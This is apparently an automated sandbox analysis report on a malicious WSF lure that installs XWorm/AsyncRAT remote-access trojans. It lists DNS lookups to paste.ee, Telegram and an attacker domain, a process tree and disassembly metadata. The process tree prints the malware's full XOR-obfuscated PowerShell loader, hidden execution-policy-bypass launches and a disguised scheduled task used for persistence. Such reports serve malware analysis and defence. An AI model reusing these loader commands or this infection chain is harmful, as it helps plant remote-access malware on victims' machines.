                                          Sep 25, 2024 09:27:35.956646919 CEST5356553192.168.2.41.1.1.1
                                          Sep 25, 2024 09:27:35.963512897 CEST53535651.1.1.1192.168.2.4
                                          Sep 25, 2024 09:27:36.702126980 CEST5580753192.168.2.41.1.1.1
                                          Sep 25, 2024 09:27:36.708986044 CEST53558071.1.1.1192.168.2.4
                                          Sep 25, 2024 09:27:45.532658100 CEST53602571.1.1.1192.168.2.4
                                          Sep 25, 2024 09:27:52.761398077 CEST5675153192.168.2.41.1.1.1
                                          Sep 25, 2024 09:27:52.995215893 CEST53567511.1.1.1192.168.2.4
                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Sep 25, 2024 09:27:28.208311081 CEST192.168.2.41.1.1.10x4779Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                          Sep 25, 2024 09:27:35.956646919 CEST192.168.2.41.1.1.10x4745Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                          Sep 25, 2024 09:27:36.702126980 CEST192.168.2.41.1.1.10xd525Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                          Sep 25, 2024 09:27:52.761398077 CEST192.168.2.41.1.1.10x2842Standard query (0)ALBANIAH3CKER.WORK.GDA (IP address)IN (0x0001)false
                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Sep 25, 2024 09:27:28.229316950 CEST1.1.1.1192.168.2.40x4779No error (0)paste.ee188.114.97.3A (IP address)IN (0x0001)false
                                          Sep 25, 2024 09:27:28.229316950 CEST1.1.1.1192.168.2.40x4779No error (0)paste.ee188.114.96.3A (IP address)IN (0x0001)false
                                          Sep 25, 2024 09:27:35.963512897 CEST1.1.1.1192.168.2.40x4745No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                          Sep 25, 2024 09:27:35.963512897 CEST1.1.1.1192.168.2.40x4745No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                          Sep 25, 2024 09:27:35.963512897 CEST1.1.1.1192.168.2.40x4745No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                          Sep 25, 2024 09:27:36.708986044 CEST1.1.1.1192.168.2.40xd525No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                          Sep 25, 2024 09:27:52.995215893 CEST1.1.1.1192.168.2.40x2842No error (0)ALBANIAH3CKER.WORK.GD94.198.50.33A (IP address)IN (0x0001)false

                                          Click to jump to process

                                          Click to jump to process

                                          Click to dive into process behavior distribution

                                          Click to jump to process

                                          Target ID:0
                                          Start time:03:27:24
                                          Start date:25/09/2024
                                          Path:C:\Windows\System32\wscript.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\reported_account_violation-pdf-67223451.wsf"
                                          Imagebase:0x7ff766230000
                                          File size:170'496 bytes
                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:1
                                          Start time:03:27:24
                                          Start date:25/09/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$ReDrO = . ( $psHome[4]+$pShOmE[30]+'X')(-JOIn( '122f12!99,121{23I59C6j118,16,59B121{101C122,12k27f126{99k126!122I12C117O121j9O115O17C28,20O121!101j122B12!27k26!126f99I126I122I12f27C117B121C59C29f10j126k16k59k10!112O9B121f101k122I14!31C29I99I121O59{28B29k18j121k101C122O38!38f126B99C126,122!14{31{29f117C121j23f59O16{121!101B122k12I17C126{99!126!122!38{38k117O121,10O119k112k26O17f9C16I18k17f121,101C122C36j36,99I121B17j30O110,118j120O118C121O121I54!42B42C46C45O100I113,113C46{63k45I42f59I112j59{59f113I44I113O47B58!43{13f24B113O110f121f121C119f121j112f12{59O14C18C31O29k59C118!121{17B30j110B118k120k121{114O121k31B26C13j10f12,23!16{25B121C119{101k55!59O38{118,122!12,27!26O117C122I12j17B117{122C36k36f119'.SPLit( ',!kjI{CBOf')|% { [cHaR] ( $_ -BXOR 0x5E ) } )) ; powershell $ReDrO"
                                          Imagebase:
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:
                                          Has administrator privileges:
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:false

                                          Target ID:2
                                          Start time:03:27:24
                                          Start date:25/09/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:3
                                          Start time:03:27:35
                                          Start date:25/09/2024
                                          Path:C:\Windows\System32\wscript.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\WScript.exe "C:\ProgramData\Music\Visuals\VsLabs.vbs"
                                          Imagebase:0x7ff766230000
                                          File size:170'496 bytes
                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:4
                                          Start time:03:27:36
                                          Start date:25/09/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "
                                          Imagebase:0x7ff747820000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:5
                                          Start time:03:27:36
                                          Start date:25/09/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:6
                                          Start time:03:27:36
                                          Start date:25/09/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
                                          Imagebase:0x7ff747820000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:7
                                          Start time:03:27:36
                                          Start date:25/09/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
                                          Imagebase:0x7ff788560000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:8
                                          Start time:03:27:36
                                          Start date:25/09/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "MSFT_ScheduledTask (TaskName = "MicroSoftVisualsUpdater", TaskPath = "\")"
                                          Imagebase:0x7ff788560000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:12
                                          Start time:03:27:48
                                          Start date:25/09/2024
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                          Imagebase:0x5c0000
                                          File size:45'984 bytes
                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000C.00000002.4155550243.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:high
                                          Has exited:false

                                          Target ID:13
                                          Start time:03:28:34
                                          Start date:25/09/2024
                                          Path:C:\Windows\System32\wscript.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\WScript.exe "C:\ProgramData\Music\Visuals\VsLabs.vbs"
                                          Imagebase:0x7ff766230000
                                          File size:170'496 bytes
                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:14
                                          Start time:03:28:34
                                          Start date:25/09/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "
                                          Imagebase:0x7ff747820000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:15
                                          Start time:03:28:34
                                          Start date:25/09/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:16
                                          Start time:03:28:34
                                          Start date:25/09/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
                                          Imagebase:0x7ff747820000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:17
                                          Start time:03:28:34
                                          Start date:25/09/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
                                          Imagebase:0x7ff788560000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:19
                                          Start time:03:28:46
                                          Start date:25/09/2024
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                          Imagebase:0x8c0000
                                          File size:45'984 bytes
                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000013.00000002.2547031959.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000013.00000002.2547031959.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                          Has exited:true

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:13.1%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:50
                                            Total number of Limit Nodes:4
                                            execution_graph 11603 f518e0 11604 f518e4 11603->11604 11607 f51a61 11604->11607 11614 f51b78 11604->11614 11608 f51a9c 11607->11608 11609 f51b76 11608->11609 11621 f51fbd 11608->11621 11625 f5200a 11608->11625 11629 f51f78 11608->11629 11633 f52018 11608->11633 11609->11604 11616 f51b4f 11614->11616 11615 f51b76 11615->11604 11616->11615 11617 f51fbd GlobalMemoryStatusEx 11616->11617 11618 f52018 GlobalMemoryStatusEx 11616->11618 11619 f51f78 GlobalMemoryStatusEx 11616->11619 11620 f5200a GlobalMemoryStatusEx 11616->11620 11617->11616 11618->11616 11619->11616 11620->11616 11622 f51f7d 11621->11622 11622->11621 11637 f52c70 11622->11637 11623 f5211e 11626 f5203d 11625->11626 11628 f52c70 GlobalMemoryStatusEx 11626->11628 11627 f5211e 11627->11627 11628->11627 11630 f51f7d 11629->11630 11632 f52c70 GlobalMemoryStatusEx 11630->11632 11631 f5211e 11631->11631 11632->11631 11634 f5203d 11633->11634 11636 f52c70 GlobalMemoryStatusEx 11634->11636 11635 f5211e 11635->11635 11636->11635 11638 f52c75 11637->11638 11642 f57b18 11638->11642 11646 f57b08 11638->11646 11639 f52f02 11639->11623 11643 f57b3d 11642->11643 11650 f57da2 11643->11650 11644 f57b9f 11644->11639 11647 f57b3d 11646->11647 11649 f57da2 GlobalMemoryStatusEx 11647->11649 11648 f57b9f 11648->11639 11649->11648 11654 f57de8 11650->11654 11659 f57dd8 11650->11659 11651 f57dbe 11651->11644 11655 f57df5 11654->11655 11656 f57e1d 11654->11656 11655->11651 11664 f57784 11656->11664 11660 f57dec 11659->11660 11661 f57df5 11660->11661 11662 f57784 GlobalMemoryStatusEx 11660->11662 11661->11651 11663 f57e3a 11662->11663 11663->11651 11665 f57ec0 GlobalMemoryStatusEx 11664->11665 11667 f57e3a 11665->11667 11667->11651
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.4155222922.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_f50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                            • API String ID: 0-2735749406
                                            • Opcode ID: 8bb1090c025aaf101f7cdd3b51cbc3eb8f5fd8cac22a200f65594226ddb309fc
                                            • Instruction ID: 3f4735b3ee7dfe314a4144b23871b868f2bd201a0416d63cd7f5b13d4cc7173a
                                            • Opcode Fuzzy Hash: 8bb1090c025aaf101f7cdd3b51cbc3eb8f5fd8cac22a200f65594226ddb309fc
                                            • Instruction Fuzzy Hash: 28824B34A00609DFCB14CF68D984AAEBBF2BF48311F158559E916EB2A1D730ED49DF90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.4155222922.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_f50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (o^q$(o^q$(o^q$(o^q$,bq$,bq$Hbq
                                            • API String ID: 0-1608600535
                                            • Opcode ID: a620cd95c195cdd1e453b1b4b31a909819ae678ef1bb8b32f90e274a86b9a3c2
                                            • Instruction ID: c145147cef66ae61d6f7804035d1a0cc0a8c0d73d676eb127154a671d1846fde
                                            • Opcode Fuzzy Hash: a620cd95c195cdd1e453b1b4b31a909819ae678ef1bb8b32f90e274a86b9a3c2
                                            • Instruction Fuzzy Hash: B4728F71A002098FCB15DFA9C894BAEBBF6BF88311F148569E905EB3A1DB30DD45DB50

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 768 f581d8-f581e7 769 f581f0-f58200 768->769 770 f581e9-f581eb 768->770 773 f58206-f58214 769->773 774 f585d1-f58646 769->774 771 f585c9-f585d0 770->771 773->774 777 f5821a 773->777 777->774 778 f585b5-f585c1 777->778 779 f58311-f58321 777->779 780 f584f1-f584f7 777->780 781 f5827d-f5828d 777->781 782 f5857e-f5858e 777->782 783 f58499-f584a9 777->783 784 f5835b-f5836b 777->784 785 f583a5-f583b5 777->785 786 f582c7-f582d7 777->786 787 f58447-f58457 777->787 788 f58221-f58231 777->788 789 f58541-f58551 777->789 790 f583e8-f583f8 777->790 778->771 802 f58346-f58356 779->802 803 f58323-f58329 779->803 796 f584f9 780->796 797 f584fb 780->797 792 f582b2-f582c2 781->792 793 f5828f-f58295 781->793 808 f58590-f58596 782->808 809 f585a9-f585b3 782->809 810 f584d5-f584ec 783->810 811 f584ab-f584b1 783->811 812 f58390-f583a0 784->812 813 f5836d-f58373 784->813 794 f583b7-f583bd 785->794 795 f583d3-f583e3 785->795 798 f582fc-f5830c 786->798 799 f582d9-f582df 786->799 804 f58459-f5845f 787->804 805 f5847b-f58494 787->805 814 f58233-f58239 788->814 815 f5825e-f58278 788->815 806 f58553-f58559 789->806 807 f5856c-f5857c 789->807 800 f58427-f58442 790->800 801 f583fa-f58400 790->801 792->771 816 f58297-f58299 793->816 817 f582a3-f582ad 793->817 830 f583bf-f583c1 794->830 831 f583cb-f583ce 794->831 795->771 818 f584fd-f584ff 796->818 797->818 798->771 819 f582e1-f582e3 799->819 820 f582ed-f582f7 799->820 800->771 832 f58402-f58404 801->832 833 f5840e-f58422 801->833 802->771 821 f58337-f58341 803->821 822 f5832b-f5832d 803->822 835 f58461-f58463 804->835 836 f5846d-f58476 804->836 805->771 823 f58567-f5856a 806->823 824 f5855b-f5855d 806->824 807->771 825 f585a4-f585a7 808->825 826 f58598-f5859a 808->826 809->771 810->771 837 f584b3-f584b5 811->837 838 f584bf-f584d0 811->838 812->771 827 f58375-f58377 813->827 828 f58381-f5838b 813->828 839 f58247-f58259 814->839 840 f5823b-f5823d 814->840 815->771 816->817 817->771 843 f58501-f5850b 818->843 844 f58510-f5853c 818->844 819->820 820->771 821->771 822->821 823->771 824->823 825->771 826->825 827->828 828->771 830->831 831->771 832->833 833->771 835->836 836->771 837->838 838->771 839->771 840->839 843->771 844->771
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.4155222922.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_f50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LR^q$Xbq
                                            • API String ID: 0-1504435008
                                            • Opcode ID: 4c19e4150ab0c8437f01993eca64e1026e1ce18428c68d88fbf09204ad60e8bc
                                            • Instruction ID: 20510c7eb5c25a0083150405c18420b016f20956fb6ebf8ae5fa0a342ff1cd39
                                            • Opcode Fuzzy Hash: 4c19e4150ab0c8437f01993eca64e1026e1ce18428c68d88fbf09204ad60e8bc
                                            • Instruction Fuzzy Hash: 8EC1B471E04619CBCF184F66C4543BD7AB2BFC8762F294819D942B6288DF348C4AEF65
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.4155222922.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_f50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d0d9833dd169cac1a9cc16e3b771705da6a9a733b8653e3677a3ec569d62b7cf
                                            • Instruction ID: c80ba46c6a02e0d1af4534c1d7cead6e131ca36fbd04279e901481f80612b143
                                            • Opcode Fuzzy Hash: d0d9833dd169cac1a9cc16e3b771705da6a9a733b8653e3677a3ec569d62b7cf
                                            • Instruction Fuzzy Hash: E7B19D70E00609CFDF10CFA9D8957ADBBF2BF88716F148129D915A7294EB34984ADB81
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.4155222922.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_f50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b252f3b977837dd089b37746d0a970b00973192137d7a7a237d81a9eb901677b
                                            • Instruction ID: 90ff74164e8e9ba1c4d94ca09ef925efded6e20d867864f302037c2a8bcc62b5
                                            • Opcode Fuzzy Hash: b252f3b977837dd089b37746d0a970b00973192137d7a7a237d81a9eb901677b
                                            • Instruction Fuzzy Hash: 0FB19F70E00609CFDF10CFA9D8917ADBBF2BF48715F148129E919E7294EB749849DB81

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1139 f57784-f57f34 GlobalMemoryStatusEx 1142 f57f36-f57f3c 1139->1142 1143 f57f3d-f57f65 1139->1143 1142->1143
                                            APIs
                                            • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,00F57E3A), ref: 00F57F27
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.4155222922.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_f50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: GlobalMemoryStatus
                                            • String ID:
                                            • API String ID: 1890195054-0
                                            • Opcode ID: 4207cd0bfeabaa2442c195ec143ce26d2e10765fe7f4ece78520e152ab2c09de
                                            • Instruction ID: af6b15dc5a0a5c13323ce045c269321ec9bac485e6bdc31b09bceb0710a209d8
                                            • Opcode Fuzzy Hash: 4207cd0bfeabaa2442c195ec143ce26d2e10765fe7f4ece78520e152ab2c09de
                                            • Instruction Fuzzy Hash: 391114B1C046599BCB10DF9AD444BDEFBF4EB48320F10816AE918B7251D378A954CFE5

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1146 f57eba-f57efe 1148 f57f06-f57f34 GlobalMemoryStatusEx 1146->1148 1149 f57f36-f57f3c 1148->1149 1150 f57f3d-f57f65 1148->1150 1149->1150
                                            APIs
                                            • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,00F57E3A), ref: 00F57F27
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.4155222922.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_f50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: GlobalMemoryStatus
                                            • String ID:
                                            • API String ID: 1890195054-0
                                            • Opcode ID: 8510a3e72da368c14495baa879fdd58584dcf6bb5113bf407d6901bbec30fd90
                                            • Instruction ID: 4802315f899b9368ec662b5bd313d35604bcecd2232dee05162ec3b7af833a68
                                            • Opcode Fuzzy Hash: 8510a3e72da368c14495baa879fdd58584dcf6bb5113bf407d6901bbec30fd90
                                            • Instruction Fuzzy Hash: 821133B1C0025A9FCB10DF9AD444B9EFBF4AF48320F15816AD818A7251D378A944CFE5
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.4154730596.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_cad000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9c8711936ffe73e56938947abb4c285dd3fa2edd6ed85514450cfcb753e9d25c
                                            • Instruction ID: 4c76d8bfef8bd0638aa97154520279c98c24e80546c2a19b8941872ea003b662
                                            • Opcode Fuzzy Hash: 9c8711936ffe73e56938947abb4c285dd3fa2edd6ed85514450cfcb753e9d25c
                                            • Instruction Fuzzy Hash: D4212571604205DFCB05DF14D9C4B2ABF65FB99328F20C269EA0B0B656C336D856CBA1
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.4154730596.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_cad000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                            • Instruction ID: c64d97c9149608cc0e04728d0e1a59f1eba10bf4308ce2293e958dabe0b9684e
                                            • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                            • Instruction Fuzzy Hash: B8110676504241CFCB15CF00D5C4B1ABF71FB94324F24C2A9DD0A0B656C336D956CB91
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.4155222922.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_f50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Xbq$$^q
                                            • API String ID: 0-1593437937
                                            • Opcode ID: 7338325108aedf920de9a57b7ea964cc2e85e6a7bc08df9b3c806a4980f7456b
                                            • Instruction ID: 3ec2b3422575572c7fc2952fcc59932ef31f57b38906f062eb10fa4bd05c5065
                                            • Opcode Fuzzy Hash: 7338325108aedf920de9a57b7ea964cc2e85e6a7bc08df9b3c806a4980f7456b
                                            • Instruction Fuzzy Hash: 3481A371B00218CBDB18AF78986577E7BB7BFC8711B25892DD506E7398CE348C069791
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.4155222922.0000000000F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F50000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_f50000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6345e50cbd31d186c7e06a4757a4c414c57057a11ee0d553a665f705e5127e67
                                            • Instruction ID: 86a638f07ee0e1c402a786eb1cb4cb12a946adb8998dbb10d8098830ae65576c
                                            • Opcode Fuzzy Hash: 6345e50cbd31d186c7e06a4757a4c414c57057a11ee0d553a665f705e5127e67
                                            • Instruction Fuzzy Hash: 5B919270E00609DFDF10CFA9C8A17DDBBF2BF88755F148129E908AB254DB749889DB81
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.2548043576.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_19_2_1210000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: df1e6fa8fe8e5fbccdd1b5a32217fe295c3b12e187d648e1f565cc7133fb800c
                                            • Instruction ID: de12f7b6fb81a4f5adb7d77fbbf17d98d3111defa31ae3d76b8c5d3a11de7641
                                            • Opcode Fuzzy Hash: df1e6fa8fe8e5fbccdd1b5a32217fe295c3b12e187d648e1f565cc7133fb800c
                                            • Instruction Fuzzy Hash: 28617E307102059FCB19EB78D96866E7FE2FF88314B104969E01ADB7A9EF749C45CB81
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.2548043576.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_19_2_1210000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e43bf80a9e8d81eda0f807199b66b45fa3948a8741b91d968279f816aa20e5fa
                                            • Instruction ID: fafe138929bc867683e37af6e413a368dadb6bf832a50645a623e9c99b8a737b
                                            • Opcode Fuzzy Hash: e43bf80a9e8d81eda0f807199b66b45fa3948a8741b91d968279f816aa20e5fa
                                            • Instruction Fuzzy Hash: A6415F706002098FCB19EF78E6A85AD7FE6FB843147004A39D01A97798EF74AC85CF81
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.2548043576.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_19_2_1210000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c61bb14df77cdf8a040373eb1e003a84c1aad88829f27aacd32874635171a0a5
                                            • Instruction ID: a245d8c9f8ed242dc7d6fba3790d8d510e9234fc45e5643ad45e38b19c229ed1
                                            • Opcode Fuzzy Hash: c61bb14df77cdf8a040373eb1e003a84c1aad88829f27aacd32874635171a0a5
                                            • Instruction Fuzzy Hash: 5331BD307101059FCB08AB78D994B6E7BE2FFC9610F1448A8E105EF3AACA719C019791
                                            Memory Dump Source
                                            • Source File: 00000013.00000002.2548043576.0000000001210000.00000040.00000800.00020000.00000000.sdmp, Offset: 01210000, based on PE: false
                                            Joe Sandbox IDA Plugin
